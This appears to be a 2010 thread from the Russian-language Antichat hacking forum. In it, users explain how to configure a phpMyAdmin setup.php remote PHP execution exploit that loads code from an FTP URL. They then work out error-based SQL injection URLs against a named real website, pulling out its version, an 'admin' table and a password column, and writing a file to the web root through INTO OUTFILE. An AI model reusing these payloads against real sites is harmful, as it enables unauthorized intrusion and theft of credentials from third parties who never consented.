HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14071  
Старый 26.06.2010, 22:20
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
CyberHunter said:
С каким содержимым файл? В скрипте
этом?
И вообще можете объяснить, что сделает
этот
скрипт?
Это сплоит на исполнение php кода

#

$pma_setup_url = 'http://site.com/phpMyAdmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/

#

$ftp_code = 'ftp://userassword@ftp.com/www/test.txt'; /*полный ftp-путь до файла с содержимым */

В $pma_setup_url путь pma....

В $ftp_code путь к текстовому файлу на фтпшке, в этом файле будет пхп код который ты хочеш испольнить,например тот же phpinfo();

Что может быть проше?
 
Ответить с цитированием

  #14072  
Старый 26.06.2010, 22:25
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

Цитата:
Сообщение от None  
Если ты следишь за лентами эксплойтов, то, наверняка, не должен был пропустить уязвимость популярнейшего менеджера баз данных MySql phpMyAdmin версий до 2.11.9 (http://www.gnucitizen.org/static/blog/2009/06/phpmyadminrcesh.txt).
Уязвимость заключалась в том, что скрипт установки ./scripts/setup.php вообще не проверял пользовательские данные, которые затем записывались в конфигурационный файл.
Эксплойт был всем хорош, кроме того, что администратор уязвимого хоста должен был вручную создать директорию ./config и дать ей права на запись (именно туда должен был записываться ядовитый конфиг), что на практике встречалось крайне редко. Настало время исправить это недоразумение.
script srazu vypolnyaet $ftp_code
 
Ответить с цитированием

  #14073  
Старый 26.06.2010, 22:28
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию

Цитата:
Сообщение от 547  
547 said:
вроде блайнд,версия 5 хелп!!!
Код:
Code:
http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--
Вы просто пипец..

Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.

Цитата:
Сообщение от pinch  
pinch said:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2)a)--
Цитата:
Сообщение от 547  
547 said:
неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...
желательно в подробностях...
Цитата:
Сообщение от CyberHunter  
CyberHunter said:
table_name:
Код:
Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+table_name),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)+--+
admin
column_name:
Код:
Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+column_name),floor(rand(0)*2))+from+information_schema.columns+where+table_name='admin'+group+by+2)a)+--+
password
Вместо version() пиши то, что тебе нужно.
Может я старомоден, но люблю начинать с конца.

http://www.plan-art.co.uk/brochures.php?catid=-5+union+select+'',null+from+mysql.user+into+outfil e+'C:/plan/def/hello.php'

Урл без ввв > http://plan-art.co.uk/hello.php - палюсь
 
Ответить с цитированием

  #14074  
Старый 26.06.2010, 22:34
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от v1d0qz  
v1d0qz said:
Вы просто пипец..
Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...
 
Ответить с цитированием

  #14075  
Старый 26.06.2010, 22:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...
насколько знаю не можешь
 
Ответить с цитированием

  #14076  
Старый 26.06.2010, 23:11
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

я думаю что можно
 
Ответить с цитированием

  #14077  
Старый 26.06.2010, 23:15
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
я думаю что можно
ну так колдуй и покажи нам запрос, мне тоже интересно
 
Ответить с цитированием

  #14078  
Старый 26.06.2010, 23:23
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
ну так колдуй и покажи нам запрос, мне тоже интересно
пока ниче неполучается
 
Ответить с цитированием

  #14079  
Старый 26.06.2010, 23:30
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Груп_конкат там не катит, а значит нельзя.
 
Ответить с цитированием

  #14080  
Старый 26.06.2010, 23:33
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

а я о чем
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ